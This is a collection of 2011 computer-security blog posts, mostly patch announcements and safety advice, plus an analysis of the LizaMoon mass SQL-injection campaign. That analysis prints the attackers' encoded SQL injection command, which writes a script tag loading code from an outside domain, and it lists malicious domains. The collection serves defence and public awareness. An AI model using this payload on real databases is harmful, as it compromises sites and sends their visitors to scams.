Computer Security Articles

A little earlier as announced, Adobe released updated versions of Adobe Acrobat and Reader. These programs were vulnerable to the Flash Player zero-day-vulnerability as well, which was fixed last week already. As the vulnerability is rated critical, users of Acrobat and Reader should download and install the updates as soon as possible.

The updated version for Adobe Reader is available in the Download Center. For Acrobat, the new releases are linked in the refreshed security advisory.

Dirk Knop
Technical Editor
techblog.avira.com

Microsoft has issued a security patch for Silverlight KB2526954. It fixes several security issues. However, the Microsoft link to KB2526954 is still not live. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.

Direct download http://go.microsoft.com/fwlink/?LinkID=149156

[1] http://www.microsoft.com/getsilverlight/Get-Started/Install/Default.aspx

– Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Just a short notice on the now available Adobe Flash Player Update: Version 10.2.159.1 has been released which fixes the critical security vulnerability which allow attackers to infect computers with malware – just with luring victims onto hacked websites, for example. The update is available for Windows, Mac, Linux and Solaris in Adobe’s Download Center. Users and administrators should install the new version immediatly!

Dirk Knop
Technical Editor
techblog.avira.com

This is good news – for the recently acknowledged zero-day security vulnerability within Adobe Flash Player, Acrobat and Reader there will be a first update available tomorrow. Adobe updated their security advisory on that matter to reflect the update schedule – the Flash Player update fixing the vulnerability for Windows, Mac, Linux and Solaris will be available tomorrow, Friday, April 15.

For the also vulnerable Adobe Reader and Acrobat, updates are planned “no later than the week of April 25, 2011″. The only exception is Adobe Reader X for Windows which will be updated on the regular planned Patchday on June 14, as the integrated sandbox prevents successful exploitation there according to Adobe.

Please be prepared to download and install the update tomorrow as soon as it is available!

Dirk Knop
Technical Editor

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon.com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))–

More information is available over on Stackoverflow.com.

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

Questions & Answers about the LizaMoon mass-injection

Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. So far we have only had reports of Microsoft SQL Server 2003 and 2005 being affected, so if you have any information that says that 2008 has been hit as well, we'd like to know about it.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are vulnerabilities in the Web systems used by these sites, such as outdated CMS and blog systems.

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

Every week or even day we see new vulnerabilities popping up in all software packages which we use daily: In the operating system (Windows, Mac, Linux), PDF Readers, Web browsers, Mail clients, Office suites, and so on. It is critical to install the available updates for all these software packages in order to not become a victim of malware and online fraudsters.

A neighbour of mine without any IT knowledge asked me some time ago why she should update her programs when everything works perfectly for her and she doesn’t need other features from that software? She was using her rather old laptop running Windows 95 only for casual browsing and basic email communication. She didn’t have an antivirus solution installed because it was slowing down the laptop significantly. IE6, Outlook Express and Notepad were everything she ever needed and used. She never heard of Facebook, Twitter, instant messaging or drive-by-downloads.

When I am confronted with such a situation where it doesn’t make any sense to explain the dangers of the online world, I try to use simple terms and analogies which everybody can understand. Imagine that your computer is like a house in which you have your goods and where you live. Of course, just like everybody else, you want to feel comfortable and secure in your house, you want privacy and make sure that no one can steal your goods when you are not at home.

Our house
For comfort, a house needs basic facilities like water, electricity and gas. You may also want to have certain commodities like TV with cable network, a telephone and an Internet connection. For security and privacy, the house needs walls, doors and windows with locks. Depending on where you live – for example in a village or a big city where the crime rate is higher – you may want to install a burglar alarm to secure your windows and doors. If you live in a country where the winter is very cold, you may want to insulate the walls in order to keep the heat inside.

Just like a house, the computer also needs some basic components to function correctly and you need some additional elements to give you comfort when using the computer. These basic components are the operating system (Windows, Mac, and so on) with all its elements (drivers, programs) and your commodities are for example a web browser, a document reader, an email client and an office suite.

If you restrict yourself to the basics, never exchange or receive documents with and from the external world, you can compare your computer with a house with minimal facilities or a hut. I doubt that these days this is a real use case for anyone. Assuming that you are just like the rest of us who need a computer with an Internet connection, then the situation looks different.

When you are on the Internet, it is just like you have a house in the middle of a big city. Can you imagine it without doors, windows (with blinds) and locks? Of course not, otherwise it would be like a public domain and you wouldn’t have any privacy and security.

So, you need some security elements. For a computer this means that it needs some kind of security software which keeps strangers away from your information. But a software which has problems (like security vulnerabilities) is the equivalent of a house which has doors and windows but the locks are damaged, thus allowing unrestricted access for everyone. In a house one can enter through the main door, basement, windows or a balcony. These elements which can grant access must be closed or locked in order to guarantee you security and privacy. Exactly like in a house, in a computer there are many ways to get access. A vulnerable operating system or program can be like the basement door left open or even closed but unlocked, no matter if the main door has the latest generation of security system.

This is why it is important to have everything secured, or in a computer, updated to the latest version. A security software is like having a security system installed on the main door and windows. Depending on the type of security software, it can make sure that nobody enters on the basement door or other doors. It might even tell you that some locks in the house are damaged and that they should be replaced. Like in an intelligent house, it could even order the replacements for you and call a technician to install them. For example, this is what an update service does for the software on your computer; it downloads and installs the required software for you.

To close the story with my neighbour, I managed to install the Avira AntiVir Personal edition, scheduled Windows to update itself automatically every day, and installed Firefox and Thunderbird as default Web and Mail clients instead of IE6 and Outlook Express. I created also a free account on an online backup provider and scheduled a synchronization with the cloud every day. This way, her documents were also safe (she didn’t have an external hard drive for backup).

The old laptop of my neighbour wasn’t working significantly slower as before, but now it was like an old house which got renovated: It looks good and it is comfortable, it is secure and provides privacy, but from time to time you hear the floor or the walls making strange noises because the components are old.

With a little help
On a side note, there are various free software solutions which can help identifying the applications which need updates because of known security vulnerabilities. Perhaps the best known is Secunia Online Software Inspector (OSI) and its equivalent for installing on the PC called Secunia Personal Software Inspector (PSI).

More hints about securing the own computer, networks and privacy can be found in the other articles of the “Improve your Security” series:
Improve your Security #1: Complex passwords aren’t always better
Improve your Security #2: Securing your notebook
Improve your Security #3: Online Protection

Sorin Mustaca
Data Security Expert

Let’s take a look at the latest in long line of fake stalker apps on Facebook.

This one is called “Profile Update”, and makes a number of claims in relation to tracking vistors while changing your profile background. “Change your background and see your stalkers”, they claim – installing their update will let you see who is stalking you.

Click to Enlarge

Click to Enlarge

If you agree to their terms of service (which are rather long and mention Singapore as being the base of operations for this one) you’ll be prompted to install the rogue application when logging in, giving access to your basic information, granting wall posting rights and letting it “access your data anytime”.

Click to Enlarge|

You’ll also be prompted to fill in the inevitable survey, which randomly decides to talk about “Profile Peekers 2.0″ instead of “Profile Update”. It’s almost like they’re making it up as they go along.

Click to Enlarge

While you’re busy signing your life away to coupons, fruit snack offers and fabric conditioner trials your wall will start to look like this:

Click to Enlarge

Before the police come and take me away for questioning, I should mention that some of the URLs involved are foksrox21(dot)info and wurstbrota(dot)info. Please don’t be fooled by these stalker apps – scams such as these have been around since the days of Myspace, and they didn’t work then either. Wurstbrota is still live, but the foxrox URL currently redirects to a Formspring page. The rogue application seems to be currently unavailable too, so hopefully this is in the process of being shut down.

Christopher Boyd

Right after the Mozilla Developers and Google released new webbrowser versions to fix plenty of security vulnerabilities, now Apple fixes at least 62 vulnerabilities in the Safari webbrowser 5.0.4. A little late though as the CanSecWest conference is already running in Vancouver – and Safari in Mac OS X now was the first combo to fall victim to successful hacking attempts.

As these are quite obviously critical security updates, users and administrators should install them as soon as possible! The updates are offered via the automatic update, but can be downloaded manually from Apples website, too.

Also, Apple ships iOS 4.3 earlier than previously announced – it was expected later tomorrow. Next to interesting features such as an integrated WiFi Hotspot iOS 4.3 also contains the security fixes in the webbrowser. Thus iPhone, iPad and iPod Touch users should connect their devices to their main computer and fire up iTunes to install the most recent iOS version, too!

Dirk Knop
Technical Editor

Microsoft has released an “important, non-security update” ( KB971029) that restricts Autorun entries in the AutoPlay dialog to only CD and DVD drives.

This update is apply for Windows XP/Vista/non-Windows 7.

Applying this update will help in curbing the malwares using the Autorun feature as mentioned in This blog.

We highly recommend the users to visit the below site and apply the patch urgently.
http://support.microsoft.com/?kbid=971029

The Microsoft’s Tuesday patch also contains fixes for vulnerabilities in the Windows Graphics Rendering Engine, as well as CSS exploit in Internet Explorer that could allow an attacker to gain remote code execution.

We request all the users to keep there system latest updated.

Microsoft tried to push an update to their newly released Windows Phone 7 this week and accidentally bricked some Samsung-branded handsets.

Microsoft has since pulled the update, but only for the Samsung Omnia handsets affected by the flaw. Even more embarrassing, the update was intended to improve the updating process and provided no enhancements for users of the phones.

If you have one of the affected devices there are experimental instructions on how to recover your phone.

Microsoft has elected to centrally control the distribution of updates for the Windows Phone 7 platform, which ultimately puts them in a sort of middle ground. After an accident like this one, carriers may begin applying pressure on Microsoft to let them decide if and when handsets receive updates.

Why does this matter? Well, the smartphone landscape is quite diverse when it comes to how much control phone and operating system manufacturers have compared to the carriers.

At one end of the spectrum we have Apple and Research In Motion, the manufacturer of the BlackBerry devices. Both companies centrally control all software and updates they provide for their phones, and no one else produces the handsets. This enables a very rigorous QA process to find defects and allows Apple and RIM to ship fixes and updates to improve security on a more regular basis.

At the other end of the spectrum is the Android platform from Google. While Google produces what you might call a “reference design” OS, it is up to the manufacturers to customize and test it on their devices. There are many different companies producing Android phones for many different carriers.

Not only is the OS somewhat unique per device, but carriers are also producing their own customizations, further diversifying the variants of Android in the field.

This can be a real problem. When you need security updates, you must rely on Google to fix the bug, your device manufacturer to patch their custom OS, and your carrier to decide that they are willing to provide you with the fix. This is a huge security mess.

Microsoft has chosen a path right down the middle. Like Google, they are not producing handsets, but they are trying to create a centrally distributed operating system platform that they control.

From a security perspective this appears to be a solid approach, allowing Microsoft to ensure devices in the field are all able to consume patches when they make them available, but it does come with risk.

Because Microsoft is placing the burden of their software SNAFU on the carriers and manufacturers, I expect we’ll see a backlash against their preferred updating method. This incident could not have come at a worse time for them, as they are trying to enter a very competitive smartphone market in which any bad press could push consumers to better established brands.

For the latest information on the threats facing mobile users, check out our latest threat report.

Creative Commons image of phone brick courtesy of Riekus’s Flickr photostream.

In a forum Kaspersky users discussed being unable to update their anti-virus product. The posting entitled ‘Problem with the bases, Cannot update databases with 2011′ is here: http://forum.kaspersky.com/index.php?showtopic=201405. It appears as though the issue has not yet been fully resolved. Thanks Bill for letting us know.
Cheers,

Adrien de Beaupr

Intru-shun.ca Inc.

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Multiple security vulnerabilities have been found within the current Java runtime environments, both for client computers and for servers. These allow attackers to infect computers for example with a Trojan just by luring victims into visiting manipulated websites. Oracle now released updated software which users and administrators should install as soon as possible! Security holes in outdated Java versions get exploited very often on the Internet, thus updating minimizes the attack surface for cyber criminals.

In Windows operating systems – currently verified are Windows XP SP3 and Windows Server 2003 SP2 – a new security vulnerability has been found. It allows to take over a Windows PC which has network shares enabled. A patch has not been released yet. Especially in public places the firewall should be configured to block the TCP and UDP ports 138, 139 and 445, respectively, or Windows file sharing should be disabled until a patch is available.

Dirk Knop
Technical Editor

Oracle has released a new update for Java environment, it contains fixes for security issues. Time to get your Java environment up to date again.
The details on this update can be found at http://www.oracle.com/technetwork/java/javase/6u24releasenotes-307697.html
Happy Java Patching!

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

I’ve updated my WhoAmI? Firefox add-on for Firefox version 4.

You can get it from the Mozilla site.

Google has updated its Chrome Web browser and fixed nine of the browser’s security vulnerabilities in the process.

The updated Chrome version 9 was rolled out last week, and includes patches for nine defects, including faulty PDF software and secure sockets layer (SSL) libraries that left Chrome open to cyberattack.

The Chrome update also addressed an error in the browser’s audio handling program that could have allowed a hacker to escape Chrome’s built-in sandbox technology, a feature that isolates computer infections and prevents them from spreading, according to Computerworld.

Chrome’s quick fix comes at a good time for Google, who announced it would pay $20,000 to anyone who could hack into Chrome at next month’s CanSecWest conference.

To automatically update Chrome, users can go to the wrench icon in the browser’s upper right corner and select “About Google Chrome.” Chrome will check for security updates and inform you if any are available.

Among yesterday’s optional software updates from Microsoft was Update for Windows XP/Vista/non-Windows 7 (KB971029).

It’s an “important, non-security update” that restricts “AutoRun entries in the AutoPlay dialog to only CD and DVD drives”.

Excellent. This could really help curb AutoRun worms. If you’re using an older Windows computer, we highly recommend you go and apply this optional update.

You’ll need to visit update.microsoft.com and select “Custom” updates.

And you’ll find KB971029 in the “Software, Optional” category.

This update restricts USB AutoRun functionality in the AutoPlay dialog. You may also wish to take further steps and disable AutoPlay completely. See here and here for posts on that topic.

On 09/02/11 At 01:13 PM

While this post may be a bit self-serving, as Snort is made by the company that I work for (Sourcefire. In the interest of full disclosure). Since Snort is rather large piece of security software, I thought I’d point to a blog post that I put up on the Snort.org blog about the release of Snort 2.9.0.4 that is being release this Thursday.
Check out the Snort 2.9.0.4 blog post here.
ClamAV was also updated this week to version 0.97, and since this a rather large piece of security software as well, I thought I’d point to the blog post that I wrote about ClamAV 0.97 update the other day.
Thanks all.
– Joel Esler | http://blog.snort.org | http://blog.joelesler.net

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

February 8th is Safer Internet Day, a day devoted to making the Internet a better place for children. And before your child goes online… make sure their computer is up to date with secure software. There are lots of updates and patches to install this month.

Microsoft’s Security Bulletin includes a critical update for Internet Explorer that affect all versions of IE.

Note that the least affected OS is Windows XP Service Pack 3. That’s because Service Pack 2 was retired from the update cycle last year. Children are often provided “hand-me-down” computers. Before giving a child old hardware, make sure the current service pack is installed. You should also consider an alternative browser.

But then again, alternatives aren’t worry free either.

Google recently patched Chrome to version 9.0.597.84.

VLC media player, another popular alternative, has a flaw when parsing an invalid MKV file that could allow a malicious attacker to trigger an execution of arbitrary code. VLC media player 1.1.7 addresses this issue, so either update, or avoid untrusted downloads (and sites if you have the VLC plugin installed).

Adobe is also publishing an update today for Adobe Reader and Acrobat. Affected versions include Adobe Reader X (10.0) and earlier versions for both Windows and Macintosh.

On 08/02/11 At 04:46 PM

Adobe’s Reader X, last year’s upgrade that features a “sandbox” designed to protect users from PDF exploits, stymied a recent attack campaign, researchers said.

Full story: Network World on Security

[Update: The Reuters article flagged on 6th February 2011 refers to a statement by the Russian ambassador to NATO claiming that Stuxnet could have caused "another Chernobyl": more info at http://www.csoonline.com/article/659165/stuxnet-could-have-caused-new-chernobyl-russian-ambassador-says?source=rss_data_protection. Hat tip to @FSecure.]
Tip of the hat to Gary Mauvais for alerting me to an article by Nima Bagheri, CEO of U0vd: The Art of … Read More.

Full story: ESET ThreatBlog

Aryeh Goretsky posted a blog about a trojan program in a Microsoft catalog update. I thought it might be a little interesting to know how this can happen and why it doesn’t happen more often.
As it turns out, it was once my job to make sure that Microsoft did not release infected software. Initially my … Read More.

Full story: ESET ThreatBlog

Next Tuesday, on their regularly-scheduled quarterly Acrobat Patch Tuesday, Adobe will release security updates for all Windows and Mac Acrobat and Reader versions. Updates for the UNIX version are expected by the week of February 28, 2011.

Adobe committed about a year ago to a regular update cycle like Microsoft’s. It’s not often that they have been able to keep to it, as many of their updates have been urgent enough for them to go “out of band.”

Full story: Security Watch

Update Release 2 for WHS v1 has been released to Windows Update by Microsoft. It includes 8 fixes found since the last major update in August of last year.

2 of the fixes relate to security, although details are nonexistent and no security bulletin has been released on them:

Issue 6: The current version of Identity Client Run Time Library that is included in Windows Home Server contains a potential privacy issue.
Issue 8: The Remote Access website may be vulnerable to cross-site request forgery attacks.

If you run Windows Home Server and are set for Automatic Updates you should see it available. Since the update requires a reboot to install, it may not have installed, so it’s worth a check.

Full story: Security Watch

RealNetworks has announced in their blog that a security update to all versions of Windows RealPlayer has been released.

The vulnerability is of “High” severity and affects only the Windows version of RealPlayer. Mac, Linux, and RealPlayer Enterprise products are not affected.

Full story: Security Watch